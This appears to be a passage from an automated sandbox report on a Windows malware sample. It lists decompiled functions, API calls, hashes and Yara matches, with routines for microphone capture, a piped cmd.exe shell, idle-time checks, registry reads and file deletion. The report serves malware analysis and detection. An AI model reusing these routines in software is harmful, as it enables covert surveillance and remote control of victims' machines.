                                              • Part of subcall function 013C26BC: CloseHandle.KERNEL32(00000000), ref: 013C26E3
                                              • Part of subcall function 013BEBBE: EnumWindows.USER32(013BEA96,00000000), ref: 013BEBD5
                                              • Part of subcall function 013BEBBE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(013CBE60), ref: 013BEBE5
                                              • Part of subcall function 013BEBBE: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(013C5664,00000063), ref: 013BEC01
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 013BE6AC
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BE6B5
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Process$??1?$basic_string@$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseEnumHandleOpenTerminateThreadV01@V01@@WindowWindowsatoi
                                            • String ID:
                                            • API String ID: 2919580351-0
                                            • Opcode ID: dfc93ed364de23048208e0dc5db5454b473bdff50c8e9e5c337907923a5ad05c
                                            • Instruction ID: d0489ef1a76913085ab5b8383b2070abc4aa48866a07de5a49396a2d4428e61a
                                            • Opcode Fuzzy Hash: dfc93ed364de23048208e0dc5db5454b473bdff50c8e9e5c337907923a5ad05c
                                            • Instruction Fuzzy Hash: 94F09476A14119DFDB14ABF8E8589EDB738FB64716F104429D112D5494FF70A505C710
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C2100, Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 013C2117
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 013C212B
                                            • ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(013C6C00,6F525DF8), ref: 013C2140
                                            • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 013C214F
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C2158
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@FileG@1@@ModuleNameV12@
                                            • String ID:
                                            • API String ID: 758954411-0
                                            • Opcode ID: 16a457b102943b85e71f4e7ec8e58a0489b46eabb8ed2d2ca43a751dc3871b21
                                            • Instruction ID: d13a0e58c5f6411dc050781522b9633ee8ce7f7957aeb5288215dc1feb9faf80
                                            • Opcode Fuzzy Hash: 16a457b102943b85e71f4e7ec8e58a0489b46eabb8ed2d2ca43a751dc3871b21
                                            • Instruction Fuzzy Hash: 8CF0A47564010EAFDF10DB90E949EED77BDEB14709F104054F506A6194DA70BA4ACB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BD813, Relevance: 7.5, APIs: 5, Instructions: 26COMMON
                                            Download Yara Rule
                                            APIs
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 013BE4B2
                                            • atoi.MSVCRT ref: 013BE4B9
                                            • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 013BE4C1
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 013BE6AC
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BE6B5
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                            • String ID:
                                            • API String ID: 4290155986-0
                                            • Opcode ID: 37f564a81106c6f94a7d09d38553c44a0fff8977870dbb29511b8ac1a4f41721
                                            • Instruction ID: 9e3e4a9b687a210bc115372b1319686f52005890cccb9b63c0110db116eba206
                                            • Opcode Fuzzy Hash: 37f564a81106c6f94a7d09d38553c44a0fff8977870dbb29511b8ac1a4f41721
                                            • Instruction Fuzzy Hash: C1E05075714219CFD714ABA4E89DBEDBB28FB64717F000426D203D64D4EB747545C710
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BD80A, Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 013BE4B2
                                            • atoi.MSVCRT ref: 013BE4B9
                                            • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 013BE4C1
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 013BE6AC
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BE6B5
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                            • String ID:
                                            • API String ID: 4290155986-0
                                            • Opcode ID: 602a10681d7707814aca7d14e9377c0ffad738ba6097534ca2c252335326deba
                                            • Instruction ID: 11de3688907ec0b8518393c806a7350c406ee69802300e03242e6b72a70d4534
                                            • Opcode Fuzzy Hash: 602a10681d7707814aca7d14e9377c0ffad738ba6097534ca2c252335326deba
                                            • Instruction Fuzzy Hash: 59E05971B14119CFDB14ABA4ECADAEDBB28FB64716F000429D202E6494EB74B505CB10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B6CFF, Relevance: 7.5, APIs: 5, Instructions: 25fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 25%
                                            			E013B6CFF(WCHAR* __eax, void* __ecx) {
				WCHAR* _t5;
				signed int _t8;
				signed int _t9;
				void* _t15;

				_t15 = __ecx;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t5 = DeleteFileW(__eax);
				_t9 = _t8 & 0xffffff00 | _t5 != 0x00000000;
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(_t15 + 0x64, 0x13c5800);
				if(_t5 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					RemoveDirectoryW(_t5);
				}
				return _t9;
			}







                                            0x013b6d01
                                            0x013b6d06
                                            0x013b6d0d
                                            0x013b6d15
                                            0x013b6d21
                                            0x013b6d2b
                                            0x013b6d2f
                                            0x013b6d36
                                            0x013b6d36
                                            0x013b6d40

                                            APIs
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(013CB900,?,013B6D78,?,?,013B85CD), ref: 013B6D06
                                            • DeleteFileW.KERNEL32(00000000,?,013B6D78,?,?,013B85CD), ref: 013B6D0D
                                            • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(013CB89C,013C5800,?,013B6D78,?,?,013B85CD), ref: 013B6D21
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,013B85CD), ref: 013B6D2F
                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,013B85CD), ref: 013B6D36
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: G@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@G@2@@std@@$??9std@@DeleteDirectoryFileG@2@@0@RemoveV?$basic_string@
                                            • String ID:
                                            • API String ID: 1823182134-0
                                            • Opcode ID: 1f1a27cf88dd82f318c08f96d8d2a42bfa4845b3541f536798ad52c204993cac
                                            • Instruction ID: aba9c068a7f70a6980dcfa7cf5a1c2a05ca97de9d3b9b4d8bbf8a41d49e7756e
                                            • Opcode Fuzzy Hash: 1f1a27cf88dd82f318c08f96d8d2a42bfa4845b3541f536798ad52c204993cac
                                            • Instruction Fuzzy Hash: 6AE08673341721AFCB241B70EC0D5CE376CAF85726794001EF502D3545CF65B8458750
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B1895, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,?,013B1826,013C40D8,013CBCB0,?,013B8D8A,00000003,00000000), ref: 013B18A7
                                            • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(013CBCB0,?,?,?,?,?,013B1826,013C40D8,013CBCB0,?,013B8D8A,00000003,00000000), ref: 013B18B4
                                            • _CxxThrowException.MSVCRT(?,013C6F28), ref: 013B18C3
                                              • Part of subcall function 013B190F: ??2@YAPAXI@Z.MSVCRT ref: 013B191F
                                            Strings
                                            • invalid vector<T> subscript, xrefs: 013B18A2
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@??2@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                            • String ID: invalid vector<T> subscript
                                            • API String ID: 1986322901-3016609489
                                            • Opcode ID: 62ea7aeab145b11a705de28c69704d27c2d3197f55bcf98242155f215baee36a
                                            • Instruction ID: 16ffcb04f733f4352af46ef7a3d9921b8c85ff022b01b0ffdcb5766b8ed93555
                                            • Opcode Fuzzy Hash: 62ea7aeab145b11a705de28c69704d27c2d3197f55bcf98242155f215baee36a
                                            • Instruction Fuzzy Hash: 1DE0653254430FBBCF00E7E0D945DAEB77CAB10A08F100019F501A1150FA7176098B65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B500C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,00000000,013CB8D8,?,013B4EDA,00000000,00000004,013CB310,?,?,?,013BE3FF,00000000), ref: 013B501E
                                            • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,013B4EDA,00000000,00000004,013CB310,?,?,?,013BE3FF,00000000), ref: 013B502B
                                            • _CxxThrowException.MSVCRT(?,013C6F28), ref: 013B503A
                                            Strings
                                            • invalid vector<T> subscript, xrefs: 013B5019
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                            • String ID: invalid vector<T> subscript
                                            • API String ID: 3609083747-3016609489
                                            • Opcode ID: f26d06f4c4c04545ed04557c3759198f647656d5441ba3442e5da772f36989cc
                                            • Instruction ID: 3f6e4b488199f4908dfdfae58e81caa04b75d9a3c63b8473a0e146d82b494e3f
                                            • Opcode Fuzzy Hash: f26d06f4c4c04545ed04557c3759198f647656d5441ba3442e5da772f36989cc
                                            • Instruction Fuzzy Hash: 93D0EC7291020FABCF00EBE0D949CEEB77CAA14A08F400018E501A2150FA707A0D8B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C2019, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E013C2019() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x13cc1dc = _t2;
				return _t2;
			}




                                            0x013c202f
                                            0x013c2035
                                            0x013c203a

                                            APIs
                                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 013C2028
                                            • GetProcAddress.KERNEL32(00000000), ref: 013C202F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetLastInputInfo$User32.dll
                                            • API String ID: 2574300362-1519888992
                                            • Opcode ID: 5f8848a5cc2c29a56e75bf872bfb14496b672d206c2a7705a38eec1d2ccca8fc
                                            • Instruction ID: 4cac151ec4b9ff98ef433e0131b168b647d5c8099ff8fa48bf522cb299e63bdb
                                            • Opcode Fuzzy Hash: 5f8848a5cc2c29a56e75bf872bfb14496b672d206c2a7705a38eec1d2ccca8fc
                                            • Instruction Fuzzy Hash: 58C09BF4640254AFCF202FA3941E809371D6785F09F40481EF402A570DCA717400AF10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BF4AE, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E013BF4AE() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x13cbf1c = _t2;
				return _t2;
			}




                                            0x013bf4c4
                                            0x013bf4ca
                                            0x013bf4cf

                                            APIs
                                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 013BF4BD
                                            • GetProcAddress.KERNEL32(00000000), ref: 013BF4C4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: GetCursorInfo$User32.dll
                                            • API String ID: 1646373207-2714051624
                                            • Opcode ID: 62a912d7aacee13e7d95a36ef4b2a119f8082456a0762a911b9694895deba335
                                            • Instruction ID: ad6d69fa26baece644379e61555f944fe57913145ac27a24d7974ead6a284d41
                                            • Opcode Fuzzy Hash: 62a912d7aacee13e7d95a36ef4b2a119f8082456a0762a911b9694895deba335
                                            • Instruction Fuzzy Hash: 60C048F9641200AEDA206FA7A85E8297A2CA654B0EB40881EF902B170EDA7A25049F51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B1181, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E013B1181(void* __eflags, signed int _a4) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t22;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				signed int _t36;

				_t38 = __eflags;
				E013B180C(0x13cb200, __eflags, _a4);
				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x13cb1d4);
				_t36 = _a4 << 5;
				_t16 = E013B180C(0x13cb200, _t38, _a4);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t28 =  *0x13cb1dc; // 0x36329f8
				 *((intOrPtr*)(_t36 + _t28)) = _t16;
				_t17 =  *0x13cb1dc; // 0x36329f8
				_t29 =  *0x13cb1d4; // 0x0
				 *((intOrPtr*)(_t36 + _t17 + 4)) = _t29;
				_t30 =  *0x13cb1dc; // 0x36329f8
				 *((intOrPtr*)(_t36 + _t30 + 8)) = 0;
				_t31 =  *0x13cb1dc; // 0x36329f8
				 *((intOrPtr*)(_t36 + _t31 + 0xc)) = 0;
				_t32 =  *0x13cb1dc; // 0x36329f8
				 *((intOrPtr*)(_t36 + _t32 + 0x10)) = 0;
				_t33 =  *0x13cb1dc; // 0x36329f8
				 *((intOrPtr*)(_t36 + _t33 + 0x14)) = 0;
				_t19 =  *0x13cb1dc; // 0x36329f8
				waveInPrepareHeader( *0x13cb198, _t19 + _t36, 0x20);
				_t22 =  *0x13cb1dc; // 0x36329f8
				return waveInAddBuffer( *0x13cb198, _t36 + _t22, 0x20);
			}














                                            0x013b1181
                                            0x013b1196
                                            0x013b119d
                                            0x013b11ab
                                            0x013b11ae
                                            0x013b11b5
                                            0x013b11bb
                                            0x013b11c3
                                            0x013b11c6
                                            0x013b11cb
                                            0x013b11d1
                                            0x013b11d5
                                            0x013b11dd
                                            0x013b11e1
                                            0x013b11e7
                                            0x013b11eb
                                            0x013b11f1
                                            0x013b11f5
                                            0x013b11fb
                                            0x013b11ff
                                            0x013b120d
                                            0x013b1213
                                            0x013b122c

                                            APIs
                                            • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,?,?,013B116A,00000000), ref: 013B119D
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,013B116A,00000000), ref: 013B11B5
                                            • waveInPrepareHeader.WINMM(036329F8,00000020,?,?,013B116A,00000000), ref: 013B120D
                                            • waveInAddBuffer.WINMM(?,00000020,?,?,013B116A,00000000), ref: 013B1223
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                            • String ID:
                                            • API String ID: 1952094867-0
                                            • Opcode ID: f0cf5f4b832851f80a78a1c45b57def6ac68b1017e42ff8e8693d4d0dbaf4721
                                            • Instruction ID: b6251a39bd83fca2b01526941a0dccf7af51c2c9e432d9408866dc80bfdf91de
                                            • Opcode Fuzzy Hash: f0cf5f4b832851f80a78a1c45b57def6ac68b1017e42ff8e8693d4d0dbaf4721
                                            • Instruction Fuzzy Hash: E211DA356002449FC7269F65E859966BFAAEBC93D5F44882DED0AC735DDB31B801CB40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BB5A2, Relevance: 6.0, APIs: 4, Instructions: 37registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 18%
                                            			E013BB5A2(intOrPtr _a4, void* _a8, short* _a12, char _a15, short* _a16) {
				int _v8;
				char _v2056;

				_v8 = 0x400;
				if(RegOpenKeyExW(_a8, _a12, 0, 0x20019,  &_a8) != 0) {
					_push( &_a15);
					_push(0x13c5800);
				} else {
					RegQueryValueExW(_a8, _a16, 0, 0,  &_v2056,  &_v8);
					RegCloseKey(_a8);
					_push( &_a15);
					_push( &_v2056);
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z();
				return _a4;
			}





                                            0x013bb5ae
                                            0x013bb5cb
                                            0x013bb601
                                            0x013bb602
                                            0x013bb5cd
                                            0x013bb5e2
                                            0x013bb5eb
                                            0x013bb5f4
                                            0x013bb5fb
                                            0x013bb5fb
                                            0x013bb60a
                                            0x013bb614

                                            APIs
                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 013BB5C3
                                            • RegQueryValueExW.ADVAPI32(80000000,013C2203,00000000,00000000,?,00000400), ref: 013BB5E2
                                            • RegCloseKey.ADVAPI32(80000000), ref: 013BB5EB
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(013C5800,?), ref: 013BB60A
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$??0?$basic_string@CloseG@1@@G@2@@std@@G@std@@OpenQueryU?$char_traits@Value
                                            • String ID:
                                            • API String ID: 4081865614-0
                                            • Opcode ID: 5b5b368a1c3296ee8b6650000b877d09aad2bdfe9e6d30d77f347a3b4fde73c2
                                            • Instruction ID: 02afbbff0a55cfa5dc0ee258b0f25073a5355f28ae9f674ccf25c643e5f6064c
                                            • Opcode Fuzzy Hash: 5b5b368a1c3296ee8b6650000b877d09aad2bdfe9e6d30d77f347a3b4fde73c2
                                            • Instruction Fuzzy Hash: B201E47164020DFFDB21DF50ED85FDA7BBCBB08704F508161BA05DA150DB70BA189B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BD87E, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E013BD87E() {
				char _t9;
				void* _t22;
				void* _t28;
				intOrPtr _t29;

				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E013B180C(_t22 - 0x10, _t28, 1));
				_t29 =  *0x13cb889; // 0x0
				if(_t29 == 0) {
					_t9 = E013B180C(_t22 - 0x10, _t29, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E013B2B8A(_t9);
				}
				E013B17DD(_t22 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}







                                            0x013bd88e
                                            0x013bd896
                                            0x013bd89c
                                            0x013bd8a6
                                            0x013bd8b1
                                            0x013bd8b7
                                            0x013be597
                                            0x013be6a4
                                            0x013be6ac
                                            0x013be6b5
                                            0x013be6c1

                                            APIs
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 013BD88E
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 013BD8B1
                                              • Part of subcall function 013B2B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 013B2BDC
                                              • Part of subcall function 013B2B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 013B2BFB
                                              • Part of subcall function 013B2B8A: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(013CB860,cmd.exe), ref: 013B2C1F
                                              • Part of subcall function 013B2B8A: getenv.MSVCRT ref: 013B2C34
                                              • Part of subcall function 013B2B8A: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 013B2C3E
                                              • Part of subcall function 013B2B8A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(013C5774), ref: 013B2C4B
                                              • Part of subcall function 013B2B8A: CreatePipe.KERNEL32(013CB7A0,013CB870,013CB7F0,00000000), ref: 013B2C81
                                              • Part of subcall function 013B2B8A: CreatePipe.KERNEL32(013CB858,013CB874,013CB7F0,00000000), ref: 013B2C9B
                                              • Part of subcall function 013B2B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(013CB7A8,013CB878), ref: 013B2CF2
                                              • Part of subcall function 013B2B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 013B2D06
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 013BE6AC
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BE6B5
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CreateD@1@@PipeV01@@$??8std@@D@2@@0@V?$basic_string@Y?$basic_string@getenv
                                            • String ID:
                                            • API String ID: 187635395-0
                                            • Opcode ID: 974e0d978d2bfff37d94ec142b9815cda0aca7cd9d8a63de1db5c8668d656f48
                                            • Instruction ID: d6f17cdbf0b5e4d20692813f546b43ab20406b24206ec807972fb731623831a0
                                            • Opcode Fuzzy Hash: 974e0d978d2bfff37d94ec142b9815cda0aca7cd9d8a63de1db5c8668d656f48
                                            • Instruction Fuzzy Hash: 32F03071A0011D8FD714FBA8ECE9AEE7B28FF20319F40043AD20292494FA716504C711
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BDC5A, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 013BDC71
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 013BDC88
                                              • Part of subcall function 013BACE6: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,Function_0001B310,?), ref: 013BAD26
                                              • Part of subcall function 013BACE6: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 013BAD30
                                              • Part of subcall function 013BACE6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 013BAD44
                                              • Part of subcall function 013BACE6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(013BAD6F,00000000,?,?,?,?,?,?), ref: 013BAD5B
                                              • Part of subcall function 013BACE6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 013BAD64
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 013BE6AC
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BE6B5
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@
                                            • String ID:
                                            • API String ID: 2535041984-0
                                            • Opcode ID: 4a4205b02318defd221a2a91de6b3d1d863c3ea23701e0d535aa3d7a6a52492e
                                            • Instruction ID: 21d4970b0eb2e2f6a08087439c352c2289ab25efdd39235de703b5ff5a914eb5
                                            • Opcode Fuzzy Hash: 4a4205b02318defd221a2a91de6b3d1d863c3ea23701e0d535aa3d7a6a52492e
                                            • Instruction Fuzzy Hash: 33F03072A042198FC714FBB8ECA9AEE7B68FF70316F040429D21283585FBB16548C751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C358B, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,013B969A,?,?), ref: 013C359B
